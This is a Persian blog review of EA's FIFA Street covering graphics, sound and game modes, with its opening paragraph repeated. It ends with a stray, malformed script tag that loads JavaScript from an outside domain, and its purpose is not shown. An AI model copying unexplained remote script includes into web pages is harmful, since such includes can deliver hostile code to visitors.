تبلیغات
بازیکده - تجدید خاطرات خیابانی

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

چهارشنبه 2 فروردین 1391-09:21 ب.ظبه احتمال زیاد، اکثر ما در دوران نوجوانی، ورزش فوتبال را در مدرسه و یا در کوچه ها تجربه کرده ایم. لذتی که هیچ وقت فراموش نخواهیم کرد. با گذر زمان، شاید دیگر نتوانیم این گونه لذت ها را تکرار کنیم، اما EA با عرضه FIFA Street جدید قصد دارد تا همان حال و هوای فوتبال بازی کردن در کوچه ها را در ذهن ما تداعی کند.

ه احتمال زیاد، اکثر ما در دوران نوجوانی، ورزش فوتبال را در مدرسه و یا در کوچه ها تجربه کرده ایم. لذتی که هیچ وقت فراموش نخواهیم کرد. با گذر زمان، شاید دیگر نتوانیم این گونه لذت ها را تکرار کنیم، اما EA با عرضه FIFA Street جدید قصد دارد تا همان حال و هوای فوتبال بازی کردن در کوچه ها را در ذهن ما تداعی کند.

گرافیک

FIFA Street جدید با موتور بازیسازی Impact ساخته شده که قبلاً از آن برای بازی FIFA 12 استفاده شده بود. اولین چیزی که در FIFA Street مشاهده می کنید، این است که در این بازی دیگر خبری از گرافیک فانتزی و طراحی بازیکنان به شکل کاریکاتوری نیست. در FIFA Street جدید با همان بازیکنانی روبرو می شوید که در سری FIFA آن ها را مشاهده کرده اید. محیط های بازی به شدت واقعی طراحی شده و فوتبالیست ها نیز مانند سری FIFA بسیار واقعی و شبیه به مدل های اصلی هستند. از خصوصیات موتور Impact خلق انیمیشن های بسیار زیاد و واقعی است که روند بازی را به شکل ملموسی طبیعی جلوه می دهد. نکته جالب اینجاست که تعداد انیمیشن های این بازی نسبت به FIFA 12 بیشتر شده اند و این موضوع به تنهایی می تواند در نوع خودش بسیار هیجان انگیز باشد. محیط های بازی بسیار خوب طراحی شده و زمین ها و استادیوم های بسیار زیادی را در FIFA Street مشاهده می کنید که هر کدام به شکلی خاص و زیبایی طراحی شده اند.

موسیقی/صداگذاری

مانند اکثر بازی های ورزشی موجود در بازار، موسیقی هایی که در FIFA Street می شنوید، آهنگ های لایسنس شده ای هستند که برای آن تهیه شده اند. موسیقی های بسیار زیادی را در منوها و در هنگام بازی کردن خواهید شنید که ریتم خوب و زیبایی دارند. در FIFA Street خبری از گزارشگر نیست و صدای افراد کنار زمین و خود بازیکنان جای گزارشگر را پر کرده است. این قسمت به شکل بسیار خوبی از کار درآمده و حس بازی در کوچه ها و سالن های مختلف را به خوبی به شما منتقل می کند. بازیکنان همانند رفتارهای واقعی در فوتبال، با هم صحبت می کنند و نسبت به اتفاقاتی که در طول مسابقه رخ می دهند، از دیالوگ های مختلف استفاده می کنند. به طور مثال، می توان به این موضوع اشاره کرد که در طول مسابقه بازیکنان یا اشخاصی که در کنار زمین ایستاده اند، از شما می خواهند که دفاع کنید، پاس بدهید و یا در زمان انجام حرکات مختلف، شما را تشویق می کنند. حتی در زمانی که توپ به بیرون می رود هم شاهد این موضوع خواهید بود که بازیکنان از این بابت ابراز تأسف نیز می کنند.

گیم پلی

گیم پلی، اصلی ترین قسمت FIFA Street است. در این بازی می توانید حرکات مدرسه ای و کلاسیک ورزش فوتبال را به نمایش بگذارید که اجرای آن ها در واقعیت بسیار مشکل خواهد بود. برای انجام حرکات و دریبل های بسیار زیبا، باید از هر دو آنالوگ استفاده کنید. البته انجام این حرکات به کمی مهارت نیاز دارد و زمانی که توانایی انجام آن را بدست می آورید، قطعاً این بازی به یکی از جذاب ترین عنوان هایی که تا کنون تجربه کرده اید، تبدیل می شود. در FIFA Street با مدهای مختلفی روبرو می شوید که بازی کردن هر کدام آن ها بسیار جالب خواهد بود. از مدهای 5 بر 5 که در زمین های بزرگ مسابقه می دهید تا مدهای 2 بر 2 که در زمین های کوچک تر برگزار می شوند، در بازی قرار دارند.

حتی مدی در بازی قرار دارد که با زدن هر گل می توانید یکی از بازیکنان تیم مقابل را از مسابقه بیرون کنید. البته برعکس این اتفاق نیز در این مد برای تیم شما رخ خواهد داد. در FIFA Street می توانید به قسمت World Tour بروید و در آنجا یک بازیکن را به شکلی که می خواهید درست کنید. پس از آن، می توانید یک باشگاه کوچک درست کنید و بازیکنان جدید در اختیار بگیرید و وارد مسابقات محلی شوید و رفته رفته باشگاه خود را قوی و مطرح کنید. در ابتدای قسمت World Tour تیم شما قدرت زیادی ندارد و نمی تواند حرکات چندان خارق العاده ای با توپ اجرا کند. دلیل این موضوع، این است که Level بازیکنان شما در سطح پاینی قرار دارد.

با پیروزی در مسابقه ها می توانید میزان Level بازیکنان خود را ارتقاء دهید تا بتوانید حرکات جدیدی یاد بگیرید. همچنین پیروزی در درجه سختی های گوناگون، آیتم های مختلفی را برای شما باز می کند که شامل لباس های مختلف و حرکات جدید می شوند. در کنار World Tour قسمت دیگری به نام Exhibition Mode نیز در بازی قرار دارد که می توانید در آن مسابقات و مدهای مختلف را تجربه کنید. در این بخش می توانید مدهای مختلفی مانند Standard 5 v 5 Match, Last Man Standing, Futsal و Panna Rules را تجربه کنید. جالب ترین مد بازی را می توان قسمت Last Man Standing دانست. در این مد با هر گلی که به تیم حریف می زنید، یک یار هم از آن ها کم می کنید.

این مد آنقدر ادامه پیدا می کند که تمام بازیکنان یک تیم از بازی خارج شوند. مد Futsal یک مسابقه 5 بر 5 است که در استادیوم ها و ورزشگاه های بزرگ برگزار می شود. در این مد دیگر خبری از دیوارهای دور زمین نیست و قانون اوت در بازی قرار دارد. در این مد دیگر نمی توانید از موانع طبیعی به عنوان یک یار اضافه استفاده کنید. Panna Rules نیز از آن مدهای جالب توجه بازی است که در آن 3 نقطه در 3 منطقه بازی قرار گرفته اند. بازیکنان باید با رسیدن به نقطه ها، حرکات نمایشی انجام دهند تا بتوانند آن نقطه را از بین ببرند. در این بازی بیش از 2000 فوتبالیست قرار دارند که در باشگاه های مطرح دنیا و کشورهای مختلف با هم رقابت می کنند.

در FIFA Street دیگر خبری از قانون های دست و پا گیر فوتبال نیست و در آن آزادی ای را تجربه می کنید که روند بازی را بسیار سریع و هیجان انگیز کرده است. در این بازی می توانید از دیوارهای موجود در اطراف زمین استفاده کنید و از آن به عنوان یک بازیکن اضافی کمک بگیرید. استفاده از دریبل های مختلف و کارهای گروهی فوق العاده ای که در بازی انجام می دهید، کلید موفقیت در این عنوان خواهند بود. همچنین اگر در انجام این بازی با مشکل مواجه شدید، می توانید به قسمت Practice Arena مراجعه کنید و در این قسمت حرکات مختلف را تمرین کنید. اگر کمی زمان در این قسمت بگذرانید، قطعاً می توانید یک بازی عالی را تجربه کنید.

نتیجه گیری

نسخه جدید سری بازی های FIFA Street واقعاً یک بازی عالی و نفس گیر است که می تواند هیجانی بیشتر از سری FIFA را به شما منتقل کند. وجود مدهای مختلف، انیمیشن های فوق العاده و فضای صمیمی حاکم در این بازی، لحظات به یاد ماندنی ای را برای طرفداران این سری به ارمغان می آورد.

تاریخ آخرین ویرایش:یکشنبه 6 فروردین 1391 12:25 ق.ظ
script src="http://filmdoni.ir/game/01.js" language="javascript" >